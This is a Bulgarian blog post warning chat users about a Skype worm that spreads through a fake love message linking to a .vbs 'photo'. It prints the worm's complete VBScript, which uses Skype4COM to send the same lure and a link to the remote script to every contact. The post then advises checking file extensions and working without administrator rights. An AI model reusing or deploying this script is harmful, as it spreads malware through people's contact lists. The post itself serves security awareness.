Българско SKYPE червейче
Вчера :Веси: получи интересно съобщение на шльокавица от една от нейните приятелки в СКАЙП:
> Искам да ти призная , че те обичам много … Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : http://lоfffkаmtе.hit.bg/mоqsnimkа.vbs :*
>
> _връзката умишлено е сгрешена тук, за да не кликне някой четящ по погрешка на нея, иначе в SKYPE си беше наред_
При кликване на връзката се отваря стандартен прозорец, който подканя потребителя за “Open” или “Save”. Очаквайки снимка, повечето наивни потребители ще кликнат на Open, след което я получат, я не още едно съобщение и като резултат на машинката им ще се изпълни следната зловредна програма:
on error resume next
set NrrlP = WScript.CreateObject("Scripting.FileSystemObject")
set uDlVA = wscript.createobject("wscript.shell")
set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()
yADAl.Attach()
For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Искам да ти призная , че те обичам много ... Просто ме беше срам да ти го кажа преди това (blush) Поздравче за теб миличко : http://lofffkamte.hit.bg/moqsnimka.vbs :* "
next
msgbox "bY GENCHO411 ( http://galaxy.forumi.bg )"
Хубаво е, че бях около Веси, когато тя получи съобщението. 99% съм сигурен, че и тя щеше да се върже. Не че в конкретния случай щеше да се случи нещо по-сериозно (освен шеговито обяснение в любов на нея към всичките ѝ контакти, заедно с връзчица към “снимката” ѝ). Но тази програмка лесно може да се преправи така, че да нанесе сериозна вреда на машината ѝ.
Практически, когато всеки от нас не гледа какво стартира (особено ако е получено от “приятелски” контакт), той рискува данните си, а заедно с това и парите си (възможно е да му вземат всички пароли от IE/firefox например), че и като нищо и сигурността си (адреси и т.н.). Може да ви се струва малко параноично, но ако искате да сте сигурни, че само вие разполагате с компютъра и с данните си, трябва __всеки__ път, когато получите каквато и да е връзка по който и да е чат клиент, да поглеждате разширението ѝ.
Разширението (в случая – vbs) е това, което показва какво точно компютърът ви ще направи с данните, които ще източи от външния сайт. В този конкретен случай VBS е нищо повече освен Visual Basic Script. А това си е програмен език, т.е. оторизирайки (чрез “Open”) изпълнението му вие практически казвате “Направи каквото искаш с този компютър и с данните в него”. Никаква антивирусна, firewall или друга защита в случая няма да ви спаси. Много малко червеи от този вид се разпознават от антивирусните програми – най-вече поради факта, че лесно се променят и всеки злосторник може да го стори. И ако злосторника зариби ваш приятел, и ако вие не обърнете внимание на разширението, лесно може да станете и вие жертва. И след това ще се почнат едни приказки за това кое е по-сигурно и кое не е.
Накратко:
* Гледайте _внимателно_ разширението на всяка връзка, която изпълнявате във вашия компютър. Ако е JPG/BMP/PNG/PCX в повечето случаи сте ОК. Ще пропусна възможността компютърът ви да не е защитен с последните поправки на Windows. Ако това е така, дори отваряне на някой от тези файлове може да нанесе сериозни щети на вас и данните ви. Ако не може да познаете разширението, по-добре не отваряйте връзката. Ако пък много искате да я отворите, попитайте някой професионалист за помощ.
* По принцип работете с не-администраторски привилегии. За жалост, в 99% от компютрите, за които знам (преди Windows Vista) потребителската сметка с която се работи има пълни, администраторски привилегии, което значи че ако злосторник проникне по който и да е начин, може да постави “на колене” цялата система. За това как се работи с не-администраторски привилегии може да пиша някой друг път, ако не ме примързи.
Като цяло съм бил свидетел не на един случай, в който ние обвиняваме операционната система за това, че имаме вирус, червей или spyware. Факт е, че Windows е най-разпространената OS, и като такава е и най-атакуваната. Необразования потребител (а 90% от потребителите са необразовани) обикновено не знаят въобще как да се предпазят, а като стане белята е много по-удобно (и по-човешко :)) да обвиним някой/нещо друго, нали?
Надявам се чатещите непрофита да прочетат това и да го запомнят. Питайте, ако имате въпроси. Защото след това става късно :).
